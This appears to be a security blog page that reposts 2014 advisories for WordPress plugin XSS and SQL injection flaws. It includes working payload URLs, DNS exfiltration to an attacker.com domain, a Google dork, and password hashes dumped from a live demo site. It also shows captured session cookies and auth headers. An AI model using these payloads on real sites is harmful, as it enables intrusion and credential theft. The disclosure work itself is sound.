MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

1Oct/140

WordPress Photo Gallery Cross-Site Scripting (XSS)

Advisory ID: HTB23232
Product: Photo Gallery WordPress plugin
Vendor: http://web-dorado.com/
Vulnerable Version(s): 1.1.30 and probably prior
Tested Version: 1.1.30
Advisory Publication:  September 10, 2014  [without technical details]
Vendor Notification: September 10, 2014 
Vendor Patch: September 10, 2014 
Public Disclosure: October 1, 2014 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-6315
Risk Level: Low 
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech Bridge Security Research Lab discovered three vulnerabilities in Photo Gallery WordPress plugin, which can be 
exploited to perform Cross-Site Scripting (XSS) attacks.
 
 
1) Cross-Site Scripting (XSS) in Photo Gallery WordPress plugin: CVE-2014-6315
 
1.1 Input passed via the "callback" HTTP GET parameter to "/wp-admin/admin-ajax.php" script is not properly sanitised 
before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted 
link and execute arbitrary HTML and script code in victim's browser in context of the vulnerable website.
 
The exploitation example below uses the "alert()" JavaScript function to display "immuniweb" word:
 
http://[host]/wp-admin/admin-ajax.php?action=addImages&width=700&height=550&extensions=jpg&callback=%27%22%3E%3C/script%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E
 
1.2 Input passed via the "dir" HTTP GET parameter to "/wp-admin/admin-ajax.php" script is not properly sanitised before 
being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and 
execute arbitrary HTML and script code in victim's browser in context of the vulnerable website.
 
The exploitation example below uses the "alert()" JavaScript function to display "immuniweb" word:
 
http://[host]/wp-admin/admin-ajax.php?action=addImages&width=700&height=550&extensions=jpg&dir=%27%22%3E%3C/script%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E
 
1.3 Input passed via the "extensions" HTTP GET parameter to "/wp-admin/admin-ajax.php" script is not properly sanitised 
before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted 
link and execute arbitrary HTML and script code in victim's browser in context of the vulnerable website.
 
The exploitation example below uses the "alert()" JavaScript function to display "immuniweb" word:
 
http://[host]/wp-admin/admin-ajax.php?action=addImages&width=700&height=550&extensions=%27%22%3E%3C/script%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E
 
 
 
-----------------------------------------------------------------------------------------------
 
Solution:
 
Update to Photo Gallery 1.1.31
 
-----------------------------------------------------------------------------------------------
 
References:
 
[1] High-Tech Bridge Advisory HTB23232 - https://www.htbridge.com/advisory/HTB23232 - Cross-Site Scripting (XSS) in 
Photo Gallery WordPress plugin.
[2] Photo Gallery WordPress plugin - http://web-dorado.com/ - This plugin is a fully responsive gallery plugin with 
advanced functionality. It allows having different image galleries for your posts and pages. You can create unlimited 
number of galleries, combine them into albums, and provide descriptions and tags.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public 
use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE 
is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and 
cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
 
-----------------------------------------------------------------------------------------------
 
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details 
of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.

(37)

30Sep/140

WordPress All In One WP Security 3.8.2 SQL Injection

Advisory ID: HTB23231
Product: All In One WP Security WordPress plugin
Vendor: Tips and Tricks HQ, Peter, Ruhul, Ivy 
Vulnerable Version(s): 3.8.2 and probably prior
Tested Version: 3.8.2
Advisory Publication:  September 3, 2014  [without technical details]
Vendor Notification: September 3, 2014 
Vendor Patch: September 12, 2014 
Public Disclosure: September 24, 2014 
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2014-6242
Risk Level: Medium 
CVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech Bridge Security Research Lab discovered two SQL injection vulnerabilities in All In One WP Security WordPress plugin, which can be exploited to perform SQL Injection attacks. Both vulnerabilities require administrative privileges, however can be also exploited by non-authenticated attacker via CSRF vector. 
 
 
1) SQL Injection in All In One WP Security WordPress plugin: CVE-2014-6242
 
1.1 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the "orderby" HTTP GET parameters to "/wp-admin/admin.php" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
 
The PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the "orderby" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) sub-domain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):
 
http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29
 
This vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with an CSRF exploit, e.g.:
 
http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&order=,%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29
 
 
1.2 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the "order" HTTP GET parameters to "/wp-admin/admin.php" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
 
The PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the "order" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) sub-domain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):
 
http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29
 
This vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with CSRF exploit, e.g.:
 
<img src="http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29">
 
-----------------------------------------------------------------------------------------------
 
Solution:
 
Update to All In One WP Security 3.8.3
 
More Information:
https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/changelog/
 
-----------------------------------------------------------------------------------------------
 
References:
 
[1] High-Tech Bridge Advisory HTB23231 - https://www.htbridge.com/advisory/HTB23231 - Two SQL Injections in All In One WP Security WordPress plugin.
[2] All In One WP Security WordPress plugin - http://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin - All round best WordPress security plugin.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
 
-----------------------------------------------------------------------------------------------
 
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

(74)

30Sep/140

WordPress Users Ultra 1.3.37 SQL Injection

#################################################################################################
# Title                : Wordpress Users Ultra Plugin - SQL injection Vulnerability
# Risk                 : High+/Critical
# Author               : XroGuE
# Google Dork          : inurl: wp-content/plugins/users-ultra/
# Plugin Version       : 1.3.37
# Plugin Name          : users ultra
# Plugin Download Link : https://downloads.wordpress.org/plugin/users-ultra.zip
# Vendor Home          : http://www.usersultra.com/
# Date                 : 2014/09/27
# Tested in            : Win7 - Linux
##################################################################################################
# Description: 
# This Vulnerability Available in Both Version of This Plugin (Free & Pro Version).
# You need To Login As member and Send Or Recive a Message To Get A Message ID To Inject it.
# The Vendor Demo Has This Vulnerability,Check it at This Link: http://usersultra.com/uultra-testing/
#
# PoC :
#
# http://localhost/wp/?page_id=117&module=messages&view=[id]
#
# Proof :
#
# http://www.aparat.com/v/vNI81
# http://www.myblog.att4ck3r.ir/wordpress-users-ultra-plugin-sql-injection-vulnerability/
#
##################################################################################################
#
# Demo :
#
#    http://localhost/wp/?page_id=117&module=messages&view=1+and+1=0 union all select 1,2,3,group_concat(user_login,0x3a,user_pass),5,6,7,8,9,10 from+wp_users--
# => Users: admin:$P$BsrGHnd./mOlHkK15iHCn81gjJQekC.,test:$P$Bmfp8cwwTYKxKlPQZSJtjVfa4Vw11o1
#
#
#    http://usersultra.com/uultra-testing/myaccount/?module=messages&view=63 and 1=0 union all select 1,2,3,group_concat(user_login,0x3a,user_pass),5,6,7,8,9,10 from+wp_users--
# => Users: admin:$P$BN.dvG/wrbH1RPFn2DHAkqr6G6NrKs1,franco_zuna:$P$Bakm4N8i/uS/VDjVfQ6oeSYRJWGZ4n.,test:$P$BRraCwdfKm2WGnnukOORsHDhfWmXVv/,adan_brock:$P$BmbyJbV5L8wf.xaRWxHyjAGMz/2UxL.,sean_daze:$P$B0mbw9c/W96/4SlTAkkLGePMqqgZKX1,allnetprovider-z:$P$BuEBNJXebTD3j5gmNqSNsZd8dwQUJb.,Ali28:$P$BeMVJLGapu6EF7FdBtPtKdxGZTKBgl1,Rolan-Deri:$P$Bf/Yt2IEEPxlURhBjPkA3UXyCLIuAX/,louis_h_central_geek:$P$BsYPVcay/T4t4HRSaG0j89mmJPMGjw1
#
##################################################################################################
#
# Discovered By : XroGuE
# Website       : http://www.Att4ck3r.ir
# E-Mail        : info[at]att4ck3r[Dot]ir
#
##################################################################################################

(40)

30Sep/140

WordPress All In One Security And Firewall 3.8.3 XSS

Document Title:
===============
All In One Wordpress Firewall 3.8.3 - Persistent Vulnerability
 
 
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1325
 
 
Release Date:
=============
2014-09-29
 
 
Vulnerability Laboratory ID (VL-ID):
====================================
1327
 
 
Common Vulnerability Scoring System:
====================================
3.3
 
 
Product & Service Introduction:
===============================
WordPress itself is a very secure platform. However, it helps to add some extra security and firewall to your site by using a 
security plugin that enforces a lot of good security practices. The All In One WordPress Security plugin will take your website 
security to a whole new level. This plugin is designed and written by experts and is easy to use and understand. It reduces 
security risk by checking for vulnerabilities, and by implementing and enforcing the latest recommended WordPress security 
practices and techniques.
 
(Copy of the Vendor Homepage: https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ )
 
 
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered two persistent vulnerabilities in the official All in One Security & Firewall v3.8.3 Wordpress Plugin.
 
 
Vulnerability Disclosure Timeline:
==================================
2014-09-29: Public Disclosure (Vulnerability Laboratory)
 
 
Discovery Status:
=================
Published
 
 
Affected Product(s):
====================
Github
Product: All In One Security & Firewall - Wordpress Plugin 3.8.3
 
 
Exploitation Technique:
=======================
Remote
 
 
Severity Level:
===============
Medium
 
 
Technical Details & Description:
================================
Two POST inject web vulnerabilities has been discovered in the official All in One WP Security and Firewall v3.8.3 Plugin.
The vulnerability allows remote attackers to inject own malicious script codes to the application-side of the vulnerable service.
 
The first vulnerability is located in the 404 detection redirect url input field of the firewall detection 404 application module.
Remote attackers are able to prepare malicious requests that inject own script codes to the application-side of the vulnerable service.
The request method to inject is POST and the attack vector that exploits the issue location on the application-side (persistent).
The attacker injects own script codes to the  404 detection redirect url input field and the execution occurs in the same section 
next to the input field context that gets displayed again.
 
The second vulnerability is location in the file name error logs url input field of the FileSystem Components > Host System Logs module.
Remote attackers are able to prepare malicious requests that inject own script codes to the applicaation-side of the vulnerable service.
The request method to inject is POST and the attack vector that exploits the issue location on the application-side (persistent).
The attacker injects own script codes to the file name error logs url input field and the execution occurs in the same section 
next to the input field context that gets displayed again.
 
The security risk of the persistent POST inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.2. 
Exploitation of the application-side web vulnerability requires no privileged web-application user account but low or medium user interaction.
Successful exploitation of the vulnerability results in persistent phishing attacks, session hijacking, persistent external redirect to malicious 
sources and application-side manipulation of affected or connected module context.
 
 
Request Method(s):
        [+] POST
 
Vulnerable Module(s):
        [+] Firewall - Detection 404
        [+] FileSystem Components > Host System
Vulnerable Parameter(s):
        [+] 404 detection redirect url
        [+] file name error logs url
 
Affected Module(s):
        [+] Firewall - Detection 404
        [+] FileSystem Components > Host System
 
 
Proof of Concept (PoC):
=======================
1.1
The first POST inject web vulnerability can be exploited by remote attackers without privileged application user account and with low or 
medium user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and 
steps below to continue.
 
PoC: Exploit (Firewall > Detection 404 > [404 Lockout Redirect URL] )
 
<tr valign="top">
                <th scope="row">404 Lockout Redirect URL:</th>
<td><input size="50" name="aiowps_404_lock_redirect_url" value="http://127.0.0.1\" 
type="text"><\"<img src="\"x\"">%20%20>\"<%5C%22x%5C%22[PERSISTENT INJECTED SCRIPT CODE VIA 404 Lockout Redirect URL INPUT!]>" />
                <span class="description">A blocked visitor will be automatically redirected to this URL.</span>
                </td> 
            </tr>
        </table>
        <input type="submit" name="aiowps_save_404_detect_options" value="Save Settings" class="button-primary" />
 
        </form>
        </div></div>
        <div class="postbox">
        <h3><label for="title">404 Event Logs</label></h3>
        <div class="inside">
                        <form id="tables-filter" method="post">
            <!-- For plugins, we also need to ensure that the form posts back to our current page -->
            <input type="hidden" name="page" value="aiowpsec_firewall" />
                        <input type="hidden" name="tab" value="tab6" />            <!-- Now we can render the completed list table -->
            <input type="hidden" id="_wpnonce" name="_wpnonce" value="054474276c" /><input type="hidden" name="_wp_http_referer" 
value="/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6" />  <div class="tablenav top">
 
    <div class="alignleft actions">
      <select name='action'>
<option value='-1' selected='selected'>Bulk Actions</option>
<option value='delete'>Delete</option>
</select>
<input type="submit" name="" id="doaction" class="button action" value="Apply" onClick="return confirm("Are you sure you want to perform this bulk operation on the selected entries?")"  />
</div>
<div class='tablenav-pages no-pages'><span class="displaying-num">0 items</span>
<span class='pagination-links'><a class='first-page disabled' title='Go to the first page' href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6'>«</a>
<a class='prev-page disabled' title='Go to the previous page' href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=1'>‹</a>
<span class="paging-input"><input class='current-page' title='Current page' type='text' name='paged' value='1' size='1' /> of <span class='total-pages'>0</span></span>
<a class='next-page' title='Go to the next page' href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=0'>›</a>
<a class='last-page' title='Go to the last page' href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=0'>»</a></span></div>
<br class="clear" />
</div>
 
 
--- PoC Session Logs [POST] (Firewall > 404 Detection) ---
Status: 200[OK]
POST http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6 Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[8095] Mime Type[text/html]
   Request Header:
      Host[www.vulnerability-db.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall]
      Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; wp-settings-time-1=1411750846]
      Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=]
      Connection[keep-alive]
   Response Header:
      Server[nginx]
      Date[Fri, 26 Sep 2014 17:40:21 GMT]
      Content-Type[text/html; charset=UTF-8]
      Content-Length[8095]
      Connection[keep-alive]
      Expires[Wed, 11 Jan 1984 05:00:00 GMT]
      Cache-Control[no-cache, must-revalidate, max-age=0]
      Pragma[no-cache]
      X-Frame-Options[SAMEORIGIN]
      X-Powered-By[PleskLin]
      Vary[Accept-Encoding]
      Content-Encoding[gzip]
 
-
Status: 200[OK]
GET http://www.vulnerability-db.com/dev/wp-admin/%5C%22x%5C%22[PERSISTENT INJECTED SCRIPT CODE VIA 404 Lockout Redirect URL INPUT!] Load Flags[LOAD_NORMAL] Größe des Inhalts[557] Mime Type[text/html]
   Request Header:
      Host[www.vulnerability-db.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[image/png,image/*;q=0.8,*/*;q=0.5]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6]
      Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; wp-settings-time-1=1411750846]
      Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=]
      Connection[keep-alive]
   Response Header:
      Server[nginx]
      Date[Fri, 26 Sep 2014 17:40:22 GMT]
      Content-Type[text/html]
      Content-Length[557]
      Connection[keep-alive]
      Last-Modified[Tue, 14 May 2013 13:05:17 GMT]
      Etag["4ea065b-3c6-4dcad48e5901e"]
      Accept-Ranges[bytes]
      Vary[Accept-Encoding]
      Content-Encoding[gzip]
      X-Powered-By[PleskLin]
 
 
 
 
Reference(s):
/wp-admin/admin.php?page=aiowpsec_firewall
/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6
/wp-admin/%5C%22x%5C%22[PERSISTENT INJECTED SCRIPT CODE VIA 404 Lockout Redirect URL INPUT!]
/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=0
 
 
 
 
1.2
The second POST inject web vulnerability can be exploited by remote attackers without privileged application user account and with low or medium 
user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
 
PoC: FileSystem Components > Host System Logs
 
<div class="inside">
            <p>Please click the button below to view the latest system logs:</p>
            <form action="" method="POST">
<input id="_wpnonce" name="_wpnonce" value="92d4aba49c" type="hidden">
<input name="_wp_http_referer" value="/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4" type="hidden">
<div>Enter System Log File Name:
                <input size="25" name="aiowps_system_log_file" value="error_log>\\>\"[PERSISTENT INJECTED SCRIPT CODE!] type="text">" />
                <span class="description">Enter your system log file name. (Defaults to error_log)</span>
                </div>
                <div class="aio_spacer_15"></div>
                <input name="aiowps_search_error_files" value="View Latest System Logs" class="button-primary search-error-files" type="submit">
                <span style="display: none;" class="aiowps_loading_1">
                    <img src="http://www.vulnerability-db.com/dev/wp-content/plugins/all-in-one-wp-security-and-firewall/images/loading.gif" alt="">
                </span>            
            </form>
        </div>
 
 
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://www.vulnerability-db.com/dev/wp-admin/admin-ajax.php Load Flags[LOAD_BYPASS_CACHE  LOAD_BACKGROUND  ] Größe des Inhalts[-1] Mime Type[application/json]
   Request Header:
      Host[www.vulnerability-db.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[application/json, text/javascript, */*; q=0.01]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
      X-Requested-With[XMLHttpRequest]
      Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4]
      Content-Length[109]
      Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; wp-settings-time-1=1411750846]
      Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=]
      Connection[keep-alive]
      Pragma[no-cache]
      Cache-Control[no-cache]
   POST-Daten:
      interval[60]
      _nonce[176fea481c]
      action[heartbeat]
      screen_id[wp-security_page_aiowpsec_filesystem]
      has_focus[false]
   Response Header:
      Server[nginx]
      Date[Fri, 26 Sep 2014 17:53:44 GMT]
      Content-Type[application/json; charset=UTF-8]
      Transfer-Encoding[chunked]
      Connection[keep-alive]
      X-Robots-Tag[noindex]
      x-content-type-options[nosniff]
      Expires[Wed, 11 Jan 1984 05:00:00 GMT]
      Cache-Control[no-cache, must-revalidate, max-age=0]
      Pragma[no-cache]
      X-Frame-Options[SAMEORIGIN]
      X-Powered-By[PleskLin]
 
 
 
 
Status: 200[OK]
GET http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4 Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[6136] Mime Type[text/html]
   Request Header:
      Host[www.vulnerability-db.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4]
      Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; wp-settings-time-1=1411750846]
      Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=]
      Connection[keep-alive]
   Response Header:
      Server[nginx]
      Date[Fri, 26 Sep 2014 17:53:54 GMT]
      Content-Type[text/html; charset=UTF-8]
      Content-Length[6136]
      Connection[keep-alive]
      Expires[Wed, 11 Jan 1984 05:00:00 GMT]
      Cache-Control[no-cache, must-revalidate, max-age=0]
      Pragma[no-cache]
      X-Frame-Options[SAMEORIGIN]
      X-Powered-By[PleskLin]
      Vary[Accept-Encoding]
      Content-Encoding[gzip]
 
 
 
 
Reference(s):
/wp-admin/admin-ajax.php
/wp-admin/admin.php?page=aiowpsec_filesystem
/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4
/wp-content/plugins/all-in-one-wp-security-and-firewall/
/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4
 
 
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse of the Enter System Log File Name input context in the file system security module.
The second issue can be patched by a secure encode and parse of the 404 Lockout Redirect URL input context in the firewall 404 detection module.
Restrit the input and handle malicious context with a own secure eception handling to prevent further POSt injection attacks.
 
 
Security Risk:
==============
The security risk of the POSt inject web vulnerabilities in the firewall module are estimated as medium.
 
 
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
 
 
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either 
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers 
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even 
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation 
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break 
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
 
Domains:    www.vulnerability-lab.com     - www.vuln-lab.com                 - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com   - research@vulnerability-lab.com              - admin@evolution-sec.com
Section:    dev.vulnerability-db.com     - forum.vulnerability-db.com                - magazine.vulnerability-db.com
Social:      twitter.com/#!/vuln_lab     - facebook.com/VulnerabilityLab              - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php  - vulnerability-lab.com/rss/rss_upcoming.php       - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php  - vulnerability-lab.com/register/
 
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
 
        Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
 
 
-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

(47)

30Sep/140

IPFire 2.15 Bash Command Injection

